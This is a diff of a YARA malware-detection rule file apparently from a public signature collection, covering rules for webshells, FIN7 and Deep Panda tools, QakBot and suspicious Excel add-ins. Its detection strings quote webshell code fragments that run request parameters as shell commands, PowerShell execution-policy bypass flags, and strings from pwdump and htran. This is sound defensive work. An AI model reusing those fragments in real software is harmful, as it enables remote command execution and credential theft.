-		$se3 = " -executionpolicy bypass " ascii wide nocase
-		$se4 = " -exec bypass " ascii wide nocase
-		$se5 = " /ep bypass " ascii wide nocase
-		$se6 = " /exec bypass " ascii wide nocase
-		$se7 = " /executionpolicy bypass " ascii wide nocase
-		$se8 = " /exec bypass " ascii wide nocase
-		$sf1 = " -sta " ascii wide
-		$sf2 = " /sta " ascii wide
-		$fp1 = "Chocolatey Software" ascii wide
-		$fp2 = "VBOX_MSI_INSTALL_PATH" ascii wide
-		$fp3 = "\\Local\\Temp\\en-US.ps1" ascii wide
-		$fp4 = "Lenovo Vantage - Battery Gauge Helper" wide fullword
-		$fp5 = "\\LastPass\\lpwinmetro\\AppxUpgradeUwp.ps1" ascii
-		$fp6 = "# use the encoded form to mitigate quoting complications that full scriptblock transfer exposes" ascii
-		$fp7 = "Write-AnsibleLog \"INFO - s" ascii
-		$fp8 = "\\Packages\\Matrix42\\" ascii
-		$fp9 = "echo " ascii
-		$fp10 = "install" ascii fullword
-		$fp11 = "REM " ascii
-		$fp12 = "set /p " ascii
-		$fp13 = "rxScan Application" wide
-		$fpa1 = "All Rights"
-		$fpa2 = "<html"
-		$fpa2b = "<HTML"
-		$fpa3 = "Copyright"
-		$fpa4 = "License"
-		$fpa5 = "<?xml"
-		$fpa6 = "Help" fullword
-		$fpa7 = "COPYRIGHT"
-
-	condition:
-		filesize < 3000KB and 4 of ( $s* ) and not 1 of ( $fp* ) and uint32be( 0 ) != 0x456C6646
-}
-rule SIGNATURE_BASE_MAL_Qakbotloader_Export_Section_Feb23 : FILE
-{
-	meta:
-		description = "QakBot Export Selection"
-		author = "kevoreilly"
-		id = "cb86e9fb-a8d2-5285-aeda-622704399f8e"
-		date = "2023-02-17"
+		id = "2c6f557e-31d3-5377-a3fa-4f1507f28386"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "https://github.com/kevoreilly/CAPEv2/blob/master/LICENSE"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_qbot_feb23.yar#L22-L38"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L231-L248"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6f99171c95a8ed5d056eeb9234dbbee123a6f95f481ad0e0a966abd2844f0e1a"
-		logic_hash = "0e40cd6acdbfb17670b414bd6f2ecdf1ae26ddd6a5d85931973b98963a43aba8"
+		logic_hash = "1d6dba0c858eacea5bd67682a588105a2ff09d10bb60d9888ace07609c9b33de"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		cape_options = "export=$export"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "8cc02b721683f8b880c8d086ed055006dcf6155a6cd19435f74dd9296b74f5fc"
 
 	strings:
-		$export = {55 8B EC 83 EC 50 (3A|66 3B) ?? 74}
-		$wind = {(66 3B|3A) ?? 74 [1-14] BB 69 04 00 00 53 E8 [5-7] 74}
+		$c1 = { 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70
+               00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43
+               00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74
+               00 20 00 31 00 20 00 2D 00 20 00 31 00 39 00 }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 1 of them
 }
-rule SIGNATURE_BASE_Tools_Cmd : FILE
+rule SIGNATURE_BASE_APT_FIN7_Sample_EXE_Aug18_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file cmd.jSp"
+		description = "Detects FIN7 Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "27c3cb44-9351-52a2-8e14-afade14e3384"
-		date = "2015-06-13"
+		id = "7c66a234-9dee-5279-b855-892b12d036ff"
+		date = "2018-08-01"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L10-L32"
+		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L250-L275"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "02e37b95ef670336dc95331ec73dbb5a86f3ba2b"
-		logic_hash = "fe1a157d53bd9a48848f2711844c5e12356652ca01c84c19429c55bbb12ea488"
+		logic_hash = "780e2cb9a704e0df0383737928c2cfc8aa5de5a8f3c9dc67de866d5ac73b8402"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "608003c2165b0954f396d835882479f2504648892d0393f567e4a4aa90659bf9"
+		hash2 = "deb62514704852ccd9171d40877c59031f268db917c23d00a2f0113dab79aa3b"
+		hash3 = "16de81428a034c7b2636c4a875809ab62c9eefcd326b50c3e629df3b141cc32b"
+		hash4 = "3937abdd1fd63587022ed540a31c58c87c2080cdec51dd24af3201a6310059d4"
+		hash5 = "7789a3d7d05c30b4efaf3f2f5811804daa56d78a9a660968a4f1f9a78a9108a0"
 
 	strings:
-		$s0 = "if(\"1752393\".equals(request.getParameter(\"Confpwd\"))){" fullword ascii
-		$s1 = "java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(\"Conn\"" ascii
-		$s2 = "<%@ page import=\"java.io.*\" %>" fullword ascii
-		$s3 = "out.print(\"Hi,Man 2015<br /><!--?Confpwd=023&Conn=ls-->\");" fullword ascii
-		$s4 = "while((a=in.read(b))!=-1){" fullword ascii
-		$s5 = "out.println(new String(b));" fullword ascii
-		$s6 = "out.print(\"</pre>\");" fullword ascii
-		$s7 = "out.print(\"<pre>\");" fullword ascii
-		$s8 = "int a = -1;" fullword ascii
-		$s9 = "byte[] b = new byte[2048];" fullword ascii
+		$s1 = "x0=%d, y0=%d, x1=%d, y1=%d" fullword ascii
+		$s2 = "dx=%d, dy=%d" fullword ascii
+		$s3 = "Error with JP2H box size" fullword ascii
+		$co1 = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+               00 00 00 00 00 00 00 00 00 00 00 2E 63 6F 64 65
+               00 00 00 }
 
 	condition:
-		filesize < 3KB and 7 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of ( $s* ) and $co1 at 0x015D
 }
-rule SIGNATURE_BASE_Trigger_Drop : FILE
+rule SIGNATURE_BASE_APT_FIN7_Msdoc_Sep21_1 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file trigger_drop.php"
+		description = "Detects MalDocs used by FIN7 group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3b4f32ff-2de2-5689-869a-8a8f55e7fa0c"
-		date = "2015-06-13"
+		id = "4fbde087-ec1e-5614-af1e-f342b1766fa2"
+		date = "2021-09-07"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L35-L51"
+		reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L277-L301"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "165dd2d82bf87285c8a53ad1ede6d61a90837ba4"
-		logic_hash = "fc998ea5c2a446278823e4336ddc6a22741f82c43fbdcd95b3d12ee6a27b1dd7"
-		score = 75
+		logic_hash = "ffc91cdad91b8ab24840c6ef1a6c39aad081d986c21a88b3f2ea3ec1bcd3b52b"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "d60b6a8310373c9b84e6760c24185535"
 
 	strings:
-		$s0 = "$_GET['returnto'] = 'database_properties.php';" fullword ascii
-		$s1 = "echo('<meta http-equiv=\"refresh\" content=\"0;url=' . $_GET['returnto'] . '\">'" ascii
-		$s2 = "@mssql_query('DROP TRIGGER" ascii
-		$s3 = "if(empty($_GET['returnto']))" fullword ascii
+		$xc1 = { 00 4A 00 6F 00 68 00 6E 00 0B 00 57 00 31 00 30
+               00 50 00 72 00 6F 00 4F 00 66 00 66 00 31 00 36 }
+		$s1 = "word_data.bin" ascii fullword
+		$s2 = "V:\\DOC\\For_JS" ascii
+		$s3 = "HomeCompany" ascii
+		$s4 = "W10ProOff16" ascii
 
 	condition:
-		filesize < 5KB and all of them
+		uint16( 0 ) == 0xcfd0 and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_Injectionparameters : FILE
+rule SIGNATURE_BASE_SUSP_OBFUSC_JS_Sept21_2 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file InjectionParameters.vb"
+		description = "Detects JavaScript obfuscation as used in MalDocs by FIN7 group"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a77bd0c6-8857-577f-831a-0fcf2537667e"
-		date = "2015-06-13"
+		id = "5ab9cd60-077c-5066-bd2f-8da261aae1e0"
+		date = "2021-09-07"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L53-L67"
+		reference = "https://www.anomali.com/blog/cybercrime-group-fin7-using-windows-11-alpha-themed-docs-to-drop-javascript-backdoor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_fin7.yar#L303-L323"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "4f11aa5b3660c45e527606ee33de001f4994e1ea"
-		logic_hash = "6bb786256f7154013408323eeb597f91c609a2a26f5ae9e6d61e16bd9c16a577"
-		score = 75
+		logic_hash = "235ff8fe5c033fd90d77ecf9ce80b59be7bf6ae5a2863a1c9365d8b125a7ff3f"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Public Shared ReadOnly Empty As New InjectionParameters(-1, \"\")" fullword ascii
-		$s1 = "Public Class InjectionParameters" fullword ascii
+		$s1 = "=new RegExp(String.fromCharCode(" ascii
+		$s2 = ".charCodeAt(" ascii
+		$s3 = ".substr(0, " ascii
+		$s4 = "var shell = new ActiveXObject(" ascii
+		$s5 = "= new Date().getUTCMilliseconds();" ascii
+		$s6 = ".deleteFile(WScript.ScriptFullName);" ascii
 
 	condition:
-		filesize < 13KB and all of them
+		filesize < 6000KB and ( 4 of them )
 }
-rule SIGNATURE_BASE_Users_List : FILE
+rule SIGNATURE_BASE_Deeppanda_Sl_Txt_Packed
 {
 	meta:
-		description = "Chinese Hacktool Set - file users_list.php"
+		description = "Hack Deep Panda - ScanLine sl-txt-packed"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2d90b593-6b65-502c-aeb0-8f2a3d65afd3"
-		date = "2015-06-13"
+		id = "7a335810-2bf9-5a0b-bef4-1bade65a0f00"
+		date = "2015-02-08"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L69-L84"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_deeppanda.yar#L3-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6fba1a1a607198ed232405ccbebf9543037a63ef"
-		logic_hash = "debd8e1d882cbbe6e720b86bec3ff3c78393cb225b3f0f9c7725cfced6582e71"
+		hash = "ffb1d8ea3039d3d5eb7196d27f5450cac0ea4f34"
+		logic_hash = "37f875dcb2c920278c2625085c97a9dcce1907198409595a10e6a3fbce767f35"
 		score = 75
-		quality = 85
-		tags = "FILE"
+		quality = 60
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<a href=\"users_create.php\">Create User</a>" fullword ascii
-		$s7 = "$skiplist = array('##MS_AgentSigningCertificate##','NT AUTHORITY\\NETWORK SERVIC" ascii
-		$s11 = "&nbsp;<b>Default DB</b>&nbsp;" fullword ascii
+		$s0 = "Command line port scanner" fullword wide
+		$s1 = "sl.exe" fullword wide
+		$s2 = "CPports.txt" fullword ascii
+		$s3 = ",GET / HTTP/.}" fullword ascii
+		$s4 = "Foundstone Inc." fullword wide
+		$s9 = " 2002 Foundstone Inc." fullword wide
+		$s15 = ", Inc. 2002" fullword ascii
+		$s20 = "ICMP Time" fullword ascii
 
 	condition:
-		filesize < 12KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_Trigger_Modify : FILE
+rule SIGNATURE_BASE_Deeppanda_Lot1
 {
 	meta:
-		description = "Chinese Hacktool Set - file trigger_modify.php"
+		description = "Hack Deep Panda - lot1.tmp-pwdump"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a7d65a9f-82de-554c-8f20-7560d2160041"
-		date = "2015-06-13"
+		id = "c72120a5-8637-580c-9856-e070dfb6df94"
+		date = "2015-02-08"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L86-L103"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_deeppanda.yar#L24-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c93cd7a6c3f962381e9bf2b511db9b1639a22de0"
-		logic_hash = "6ea0221af9e9a29d3280a01eec69e31e79c358e664d286f8c80259f5e826876c"
+		hash = "5d201a0fb0f4a96cefc5f73effb61acff9c818e1"
+		logic_hash = "92169a1288f30dc6008e1a8c9b2b700f878c90aa09634e36fea586e19657dbd1"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "<form name=\"form1\" method=\"post\" action=\"trigger_modify.php?trigger=<?php e" ascii
-		$s2 = "$data_query = @mssql_query('sp_helptext \\'' . urldecode($_GET['trigger']) . '" ascii
-		$s3 = "if($_POST['query'] != '')" fullword ascii
-		$s4 = "$lines[] = 'I am unable to read this trigger.';" fullword ascii
-		$s5 = "<b>Modify Trigger</b>" fullword ascii
+		$s0 = "Unable to open target process: %d, pid %d" fullword ascii
+		$s1 = "Couldn't delete target executable from remote machine: %d" fullword ascii
+		$s2 = "Target: Failed to load SAM functions." fullword ascii
+		$s5 = "Error writing the test file %s, skipping this share" fullword ascii
+		$s6 = "Failed to create service (%s/%s), error %d" fullword ascii
+		$s8 = "Service start failed: %d (%s/%s)" fullword ascii
+		$s12 = "PwDump.exe" fullword ascii
+		$s13 = "GetAvailableWriteableShare returned an error of %ld" fullword ascii
+		$s14 = ":\\\\.\\pipe\\%s" fullword ascii
+		$s15 = "Couldn't copy %s to destination %s. (Error %d)" fullword ascii
+		$s16 = "dump logon session" fullword ascii
+		$s17 = "Timed out waiting to get our pipe back" fullword ascii
+		$s19 = "SetNamedPipeHandleState failed, error %d" fullword ascii
+		$s20 = "%s\\%s.exe" fullword ascii
 
 	condition:
-		filesize < 15KB and all of them
+		10 of them
 }
-rule SIGNATURE_BASE_Customize : FILE
+rule SIGNATURE_BASE_Deeppanda_Htran_Exe
 {
 	meta:
-		description = "Chinese Hacktool Set - file Customize.aspx"
+		description = "Hack Deep Panda - htran-exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a69e1234-cc85-5295-a45c-693afdfc368e"
-		date = "2015-06-13"
+		id = "2a551e82-aff1-5a77-bc5e-d06e49dca8bc"
+		date = "2015-02-08"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L105-L121"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_deeppanda.yar#L51-L70"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "db556879dff9a0101a7a26260a5d0dc471242af2"
-		logic_hash = "f4e0a7342a01411ae060c9d995072518f2e3299af1b0d396bb319eeec42c1519"
+		hash = "38e21f0b87b3052b536408fdf59185f8b3d210b9"
+		logic_hash = "9ac5ddc53d3d5292acb3dcf68e66bc3f6ab4b8e61a71597dd84454adc516f95d"
 		score = 75
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "ds.Clear();ds.Dispose();}else{SqlCommand cm = Conn.CreateCommand();cm.CommandTex" ascii
-		$s2 = "c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=tr" ascii
-		$s3 = "Stream WF=WB.GetResponseStream();FileStream FS=new FileStream(Z2,FileMode.Create" ascii
-		$s4 = "R=\"Result\\t|\\t\\r\\nExecute Successfully!\\t|\\t\\r\\n\";}Conn.Close();break;" ascii
+		$s0 = "%s -<listen|tran|slave> <option> [-log logfile]" fullword ascii
+		$s2 = "\\Release\\htran.pdb" ascii
+		$s3 = "[SERVER]connection to %s:%d error" fullword ascii
+		$s4 = "-tran  <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s8 = "======================== htran V%s =======================" fullword ascii
+		$s11 = "-slave  <ConnectHost> <ConnectPort> <TransmitHost> <TransmitPort>" fullword ascii
+		$s15 = "[+] OK! I Closed The Two Socket." fullword ascii
+		$s20 = "-listen <ConnectPort> <TransmitPort>" fullword ascii
 
 	condition:
-		filesize < 24KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_Oracle_Data
+rule SIGNATURE_BASE_Deeppanda_Trojan_Kakfum
 {
 	meta:
-		description = "Chinese Hacktool Set - file oracle_data.php"
+		description = "Hack Deep Panda - Trojan.Kakfum sqlsrv32.dll"
 		author = "Florian Roth (Nextron Systems)"
-		id = "faa62dcc-0f59-573c-8722-d07216de151f"
-		date = "2015-06-13"
+		id = "a204f9cb-65f8-53ea-a4eb-d89112942073"
+		date = "2015-02-08"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L123-L138"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_deeppanda.yar#L72-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6cf070017be117eace4752650ba6cf96d67d2106"
-		logic_hash = "1ab9b6c4349dd891103a24a77c93c2abb784d3ed616523f3aaec68b05082983e"
+		logic_hash = "0710edea973dce6f5feccf2e7e508cd5f65aa451e0bb5aca503778ffe2363401"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ab58b6aa7dcc25d8f6e4b70a24e0ccede0d5f6129df02a9e61293c1d7d7640a2"
+		hash2 = "c6c3bb72896f8f0b9a5351614fd94e889864cf924b40a318c79560bbbcfa372f"
 
 	strings:
-		$s0 = "$txt=fopen(\"oracle_info.txt\",\"w\");" fullword ascii
-		$s1 = "if(isset($_REQUEST['id']))" fullword ascii
-		$s2 = "$id=$_REQUEST['id'];" fullword ascii
+		$s0 = "%SystemRoot%\\System32\\svchost.exe -k sqlserver" fullword ascii
+		$s1 = "%s\\sqlsrv32.dll" fullword ascii
+		$s2 = "%s\\sqlsrv64.dll" fullword ascii
+		$s3 = "%s\\%d.tmp" fullword ascii
+		$s4 = "ServiceMaix" fullword ascii
+		$s15 = "sqlserver" fullword ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Reduhservers_Reduh : FILE
+
+rule SIGNATURE_BASE_Gen_Excel_Xll_Addin_Suspicious : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file reDuh.jsp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c87d971a-a16f-5593-88fb-6bcd207e0841"
-		date = "2015-06-13"
+		description = "Detects suspicious XLL add-ins to Excel"
+		author = "@JohnLaTwC"
+		id = "013db759-ab9d-5505-933b-bda702a0941e"
+		date = "2020-10-16"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L140-L155"
+		reference = "https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_excel_xll_addin_suspicious.yar#L3-L64"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "377886490a86290de53d696864e41d6a547223b0"
-		logic_hash = "dcb1515da696566d01ec64029a34438a56d2df480b9cd2ea586f71ffe3324c1a"
-		score = 75
+		logic_hash = "d8c3f00ef05b0b84e4c4d655d01eab6f6e67714619695fd1433726e5a940e530"
+		score = 65
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "0bad4e4bc5093dcfc2737c4d8be89d6f093509a7b91a1e022050cb890d90e4e0"
+		hash2 = "133e47eedfede46d1a4529ce7f047e09521ed8c7cad2e49d3522064695bd6c43"
+		hash3 = "1994a39d5639b4eea5c3cdf084a8eacf8610a96702e580d88a6ec18887d0ec6b"
+		hash4 = "28f45d01e397841fcba48da1e61e4927f42ff6fe6f32595c23cf9a953cd2658a"
+		hash5 = "54c3598cf22ad64faeb4e0f9f70e026a1ae834a8c06e5187bf289bb3ee43a8ec"
+		hash6 = "5644a04513744edfb247d0ea83e3e2f7d616d6752cfd1af50e866bb0270131ee"
+		hash7 = "836c0d21fc3ea3a8ce1a493097a5034d110e5c50bfd7e6c3dcb674dc7a6a19ec"
+		hash8 = "b926f7db36bc5bae73091c783b0715d2af051de22a579548adf2498cb1a1d075"
+		hash9 = "6ba100a5da5efea14a5ca929628b732a6e6b8ab8f78167db35343e895997ce52"
+		hasha = "ee603cbd6187850334ae5d8adcf029d5cde710fc966b2b7a2c95249d3b23d693"
+		hashb = "99195679e998407fd4d606a0d956bda99f79625b638c63f90d9d399c6f2a143e"
+		hashc = "99534c7086128998ae39967fe5fc6bf526cb2ba5d3b2e99dc7bd03833e4a94ae"
 
 	strings:
-		$s1 = "out.println(\"[Error]Unable to connect to reDuh.jsp main process on port \" +ser" ascii
-		$s4 = "System.out.println(\"IPC service failed to bind to \" + servicePort);" fullword ascii
-		$s17 = "System.out.println(\"Bound on \" + servicePort);" fullword ascii
-		$s5 = "outputFromSockets.add(\"[data]\"+target+\":\"+port+\":\"+sockNum+\":\"+new Strin" ascii
+		$s1 = "CryptStringToBinaryA"
+		$s2 = "NtQueueApcThread"
+		$cs1 = "dsrole.dll"
+		$cs2 = "user32.dll"
+		$debug = "SeDebugPrivilege"
 
 	condition:
-		filesize < 116KB and all of them
+		filesize < 1MB and uint16( 0 ) == 0x5a4d and pe.characteristics & pe.DLL and pe.exports ( "xlAutoOpen" ) and ( ( ( pe.imports ( "KERNEL32.dll" , "LookupPrivilegeValueW" ) or pe.imports ( "KERNEL32.dll" , "LookupPrivilegeValueA" ) ) and pe.imports ( "KERNEL32.dll" , "AdjustTokenPrivileges" ) and pe.imports ( "KERNEL32.dll" , "OpenProcess" ) and $debug ) or ( pe.imports ( "ADVAPI32.dll" , "CryptDecrypt" ) and pe.imports ( "ADVAPI32.dll" , "CryptImportKey" ) ) or ( pe.imports ( "DNSAPI.dll" , "DnsQuery_A" ) or pe.imports ( "DNSAPI.dll" , "DnsQuery_W" ) ) or ( ( pe.imports ( "KERNEL32.dll" , "FindResourceA" ) or pe.imports ( "KERNEL32.dll" , "FindResourceW" ) ) and pe.imports ( "KERNEL32.dll" , "LoadResource" ) and pe.imports ( "KERNEL32.dll" , "LockResource" ) and ( pe.imports ( "KERNEL32.dll" , "VirtualAlloc" ) or pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) ) and pe.imports ( "KERNEL32.dll" , "WriteProcessMemory" ) and pe.imports ( "KERNEL32.dll" , "SetThreadContext" ) ) or ( pe.imports ( "KERNEL32.dll" , "GetThreadContext" ) and pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) and pe.imports ( "KERNEL32.dll" , "ResumeThread" ) and pe.imports ( "KERNEL32.dll" , "SetThreadContext" ) ) or ( pe.imports ( "KERNEL32.dll" , "WinExec" ) ) or ( all of ( $s* ) ) or ( all of ( $cs* ) and pe.imports ( "KERNEL32.dll" , "VirtualAllocEx" ) and pe.imports ( "KERNEL32.dll" , "TerminateProcess" ) and pe.imports ( "KERNEL32.dll" , "Sleep" ) ) )
 }
-rule SIGNATURE_BASE_Item_Old : FILE
+
+rule SIGNATURE_BASE_MAL_Malware_Imphash_Mar23_1 : HIGHVOL FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file item-old.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c32bbd48-a363-53c7-84c6-c47581e2f9da"
-		date = "2015-06-13"
-		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_cn_webshells.yar#L157-L172"
+		description = "Detects malware by known bad imphash or rich_pe_header_hash"
+		author = "Arnim Rupp"
+		id = "fb398c26-e9ac-55f9-b605-6b763021e96a"
+		date = "2023-03-20"
+		modified = "2023-03-22"
+		reference = "https://yaraify.abuse.ch/statistics/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_imphash_detection.yar#L4-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "daae358bde97e534bc7f2b0134775b47ef57e1da"
-		logic_hash = "181e46408050490dccc4f321bd1072da0436d920e16cc4711b16425eb5bd73ed"
+		hash = "167dde6bd578cbfcc587d5853e7fc2904cda10e737ca74b31df52ba24db6e7bc"
+		hash = "0a25a78c6b9df52e55455f5d52bcb3816460001cae3307b05e76ac70193b0636"
+		hash = "d87a35decd0b81382e0c98f83c7f4bf25a2b25baac90c9dcff5b5a147e33bcc8"
+		hash = "5783bf969c36f13f4365f4cae3ec4ee5d95694ff181aba74a33f4959f1f19e8b"
+		hash = "4ca925b0feec851d787e7ee42d263f4c08b0f73f496049bdb5d967728ff91073"
+		hash = "9c2d2fa9c32fdff1828854e8cc39160dae73a4f90fb89b82ef6d853b63035663"
+		hash = "2c53d58f30b2ee1a2a7746e20f136c34d25d0214261783fc67e119329d457c2a"
+		hash = "5e83747015b0589b4f04b0db981794adf53274076c1b4acf717e3ff45eca0249"
+		hash = "ceaa0af90222ff3a899b9a360f6328cbda9ec0f5fbd18eb44bdc440470bb0247"
+		hash = "82fb1ba998dfee806a513f125bb64c316989c36c805575914186a6b45da3b132"
+		hash = "cb41d2520995abd9ba8ccd42e53d496a66da392007ea6aebd4cbc43f71ad461a"
+		hash = "c7bd758506b72ee6db1cc2557baf745bf9e402127d8e49266cc91c90f3cf3ed5"
+		hash = "e6e0d60f65a4ea6895ff97df340f6d90942bbfa402c01bf443ff5b4641ff849f"
+		hash = "e8ddef9fa689e98ba2d48260aea3eb8fa41922ed718b7b9135df6426b3ddf126"
+		hash = "ad57d77aba6f1bf82e0affe4c0ae95964be45fb3b7c2d6a0e08728e425ecd301"
+		hash = "483df98eb489899bc89c6a0662ca8166c9b77af2f6bedebd17e61a69211843d9"
+		hash = "a65ed85851d8751e6fe6a27ece7b3879b90866a10f272d8af46fb394b46b90a9"
+		hash = "09081e04f3228d6ef2efc1108850958ed86026e4dfda199852046481f4711565"
+		hash = "1b2c9054f44f7d08cffe7e2d9127dbd96206ab2c15b63ebf6120184950336ae1"
+		hash = "257887d1c84eb15abb2c3c0d7eb9b753ca961d905f4979a10a094d0737d97138"
+		hash = "1cbad8b58dbd1176e492e11f16954c3c254b5169dde52b5ad6d0d3c51930abf8"
